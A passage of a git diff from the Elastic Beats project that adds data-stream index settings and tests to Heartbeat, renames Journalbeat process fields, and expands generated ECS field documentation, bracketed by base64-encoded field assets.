s9lGE9kNo+TuvL4oyxjqPzvSvw/tV3gSf9gs8DupIft+7q11LjvmdK0n3I1IrS6e+fQ4wsX/EvZDQuws+6gaKH3mk9Ks0lBPXaLlTcq5H0phHK3BTK+UlvhTcGng3+cbZlz4bb1RaYbo5mos24IgokqouPtPaLjsTv05Oxl7dCa0hDuzmBnXnPqyGYesheWdyhjfqMGg2hZIv1L4Ud/jqXhvZVZKiagWBI0BpjnSEvnvrQKGGOuoywoonMhpL4AmVCuRUhKQQ8lPnVlIN6SnWjXl3yvU66oF8EFGdBrDDGtFoSOijKIlxE5olnKjZ6v63UNPUu8UaVa5BDkUapqeB+mYRnJ+3CaQYQHIgozX0bkhOonxPLZ5cuIikSN6NWTnVg1CTPgwogXA6qfrIUVVxv45R1s1XlKXWtnE7HCghrCP2qF+sMaG3cjemflnSows641ZtbdmQH33RV4in+1WjzheA1VeZxw5vE4tDKODz6ctpTG9s1m+s+qAnKKEV7thLD1aKjaSs91rf/R1mccEIMcOYpH8rMdGJwqT2Ev+JHJ58AL85lNjNFZlhgt5cVTx5L8/wAAAP//XfMLPw==" } diff --git a/heartbeat/monitors/factory.go b/heartbeat/monitors/factory.go index 10d039d0830f..5e54eca78fed 100644 --- a/heartbeat/monitors/factory.go +++ b/heartbeat/monitors/factory.go @@ -18,6 +18,8 @@ package monitors import ( + "fmt" + "github.com/elastic/beats/v7/heartbeat/scheduler" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/cfgfile" @@ -50,9 +52,16 @@ type publishSettings struct { KeepNull bool `config:"keep_null"` // Output meta data settings - Pipeline string `config:"pipeline"` // ES Ingest pipeline name - Index fmtstr.EventFormatString `config:"index"` // ES output index pattern - DataSet string `config:"dataset"` + Pipeline string `config:"pipeline"` // ES Ingest pipeline name + Index fmtstr.EventFormatString `config:"index"` // ES output index pattern + DataStream *datastream `config:"data_stream"` + DataSet string `config:"dataset"` +} + +type datastream struct { + Namespace string `config:"namespace"` + Dataset string `config:"dataset"` + Type string `config:"type"` } // NewFactory takes a scheduler and creates a RunnerFactory that can create cfgfile.Runner(Monitor) objects. @@ -83,15 +92,9 @@ func newCommonPublishConfigs(info beat.Info, cfg *common.Config) (pipetool.Confi return nil, err } - var indexProcessor processors.Processor - if !settings.Index.IsEmpty() { - staticFields := fmtstr.FieldsForBeat(info.Beat, info.Version) - timestampFormat, err := - fmtstr.NewTimestampFormatString(&settings.Index, staticFields) - if err != nil { - return nil, err - } - indexProcessor = add_formatted_index.New(timestampFormat) + indexProcessor, err := setupIndexProcessor(info, settings) + if err != nil { + return nil, err } userProcessors, err := processors.New(settings.Processors) @@ -99,9 +102,14 @@ func newCommonPublishConfigs(info beat.Info, cfg *common.Config) (pipetool.Confi return nil, err } + // TODO: Remove this logic in the 8.0/master branch, preserve only in 7.x dataset := settings.DataSet if dataset == "" { - dataset = "uptime" + if settings.DataStream != nil && settings.DataStream.Dataset != "" { + dataset = settings.DataStream.Dataset + } else { + dataset = "uptime" + } } return func(clientCfg beat.ClientConfig) (beat.ClientConfig, error) { @@ -140,3 +148,47 @@ func newCommonPublishConfigs(info beat.Info, cfg *common.Config) (pipetool.Confi return clientCfg, nil }, nil } + +func setupIndexProcessor(info beat.Info, settings publishSettings) (processors.Processor, error) { + var indexProcessor processors.Processor + if settings.DataStream != nil { + namespace := settings.DataStream.Namespace + if namespace == "" { + namespace = "default" + } + typ := settings.DataStream.Type + if typ == "" { + typ = "synthetics" + } + + dataset := settings.DataStream.Dataset + if dataset == "" { + dataset = "generic" + } + + index := fmt.Sprintf( + "%s-%s-%s", + typ, + dataset, + namespace, + ) + compiled, err := fmtstr.CompileEvent(index) + if err != nil { + return nil, fmt.Errorf("could not compile datastream: '%s', this should never happen: %w", index, err) + } else { + settings.Index = *compiled + } + } + + if !settings.Index.IsEmpty() { + staticFields := fmtstr.FieldsForBeat(info.Beat, info.Version) + + timestampFormat, err := + fmtstr.NewTimestampFormatString(&settings.Index, staticFields) + if err != nil { + return nil, err + } + indexProcessor = add_formatted_index.New(timestampFormat) + } + return indexProcessor, nil +} diff --git a/heartbeat/monitors/factory_test.go b/heartbeat/monitors/factory_test.go new file mode 100644 index 000000000000..caa681985d7a --- /dev/null +++ b/heartbeat/monitors/factory_test.go @@ -0,0 +1,96 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package monitors + +import ( + "testing" + + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/beat/events" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/fmtstr" +) + +func TestSetupIndexProcessor(t *testing.T) { + binfo := beat.Info{ + Beat: "heartbeat", + IndexPrefix: "heartbeat", + Version: "8.0.0", + } + tests := map[string]struct { + settings publishSettings + expectedIndex string + wantProc bool + wantErr bool + }{ + "no settings should yield no processor": { + publishSettings{}, + "", + false, + false, + }, + "exact index should be used exactly": { + publishSettings{Index: *fmtstr.MustCompileEvent("test")}, + "test", + true, + false, + }, + "data stream should be type-namespace-dataset": { + publishSettings{ + DataStream: &datastream{ + Type: "myType", + Dataset: "myDataset", + Namespace: "myNamespace", + }, + }, + "myType-myDataset-myNamespace", + true, + false, + }, + "data stream should use defaults": { + publishSettings{ + DataStream: &datastream{}, + }, + "synthetics-generic-default", + true, + false, + }, + } + + for name, tt := range tests { + t.Run(name, func(t *testing.T) { + e := beat.Event{Meta: common.MapStr{}, Fields: common.MapStr{}} + proc, err := setupIndexProcessor(binfo, tt.settings) + if tt.wantErr == true { + require.Error(t, err) + return + } + require.NoError(t, err) + + if !tt.wantProc { + require.Nil(t, proc) + return + } + + _, err = proc.Run(&e) + require.Equal(t, tt.expectedIndex, e.Meta[events.FieldMetaRawIndex]) + }) + } +} diff --git a/journalbeat/Dockerfile b/journalbeat/Dockerfile index 36af746307c1..096b2ec1e791 100644 --- a/journalbeat/Dockerfile +++ b/journalbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/journalbeat/Jenkinsfile.yml b/journalbeat/Jenkinsfile.yml index f120d5f936d7..0336f113162e 100644 --- a/journalbeat/Jenkinsfile.yml +++ b/journalbeat/Jenkinsfile.yml @@ -33,3 +33,7 @@ stages: tags: true ## for all the tags unitTest: mage: "mage build unitTest" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/journalbeat/_meta/fields.common.yml b/journalbeat/_meta/fields.common.yml index e03a20eb6917..113b2a4e5f48 100644 --- a/journalbeat/_meta/fields.common.yml +++ b/journalbeat/_meta/fields.common.yml @@ -43,19 +43,19 @@ example: 3 description: > The audit session of the object process. - - name: cmd + - name: process.command_line type: keyword required: false example: "/lib/systemd/systemd --user" description: > The command line of the process. - - name: name + - name: process.name type: keyword required: false example: "/lib/systemd/systemd" description: > Name of the executable. - - name: executable + - name: process.executable type: keyword required: false description: > @@ -176,7 +176,7 @@ example: 3 description: > The audit session of the source process. - - name: cmd + - name: command_line type: keyword required: false example: "/lib/systemd/systemd --user" diff --git a/journalbeat/cmd/root.go b/journalbeat/cmd/root.go index 7f5b973cb7c7..50ded0ee692f 100644 --- a/journalbeat/cmd/root.go +++ b/journalbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "journalbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/journalbeat/docs/fields.asciidoc b/journalbeat/docs/fields.asciidoc index 969c69c0cab5..7ca5f4bc7753 100644 --- a/journalbeat/docs/fields.asciidoc +++ b/journalbeat/docs/fields.asciidoc @@ -251,7 +251,7 @@ required: False -- -*`journald.object.cmd`*:: +*`journald.object.process.command_line`*:: + -- The command line of the process. @@ -265,7 +265,7 @@ required: False -- -*`journald.object.name`*:: +*`journald.object.process.name`*:: + -- Name of the executable. @@ -279,7 +279,7 @@ required: False -- -*`journald.object.executable`*:: +*`journald.object.process.executable`*:: + -- Path to the the executable. @@ -542,7 +542,7 @@ required: False -- -*`journald.process.cmd`*:: +*`journald.process.command_line`*:: + -- The command line of the process. @@ -2738,7 +2738,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2791,7 +2791,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3982,6 +3982,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -5056,6 +5069,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -5226,6 +5252,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -8377,6 +8416,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -8552,6 +8592,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -8562,6 +8715,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -8665,6 +8931,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8781,6 +9160,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/journalbeat/include/fields.go b/journalbeat/include/fields.go index 05719a08b721..1046b7624e34 100644 --- a/journalbeat/include/fields.go +++ b/journalbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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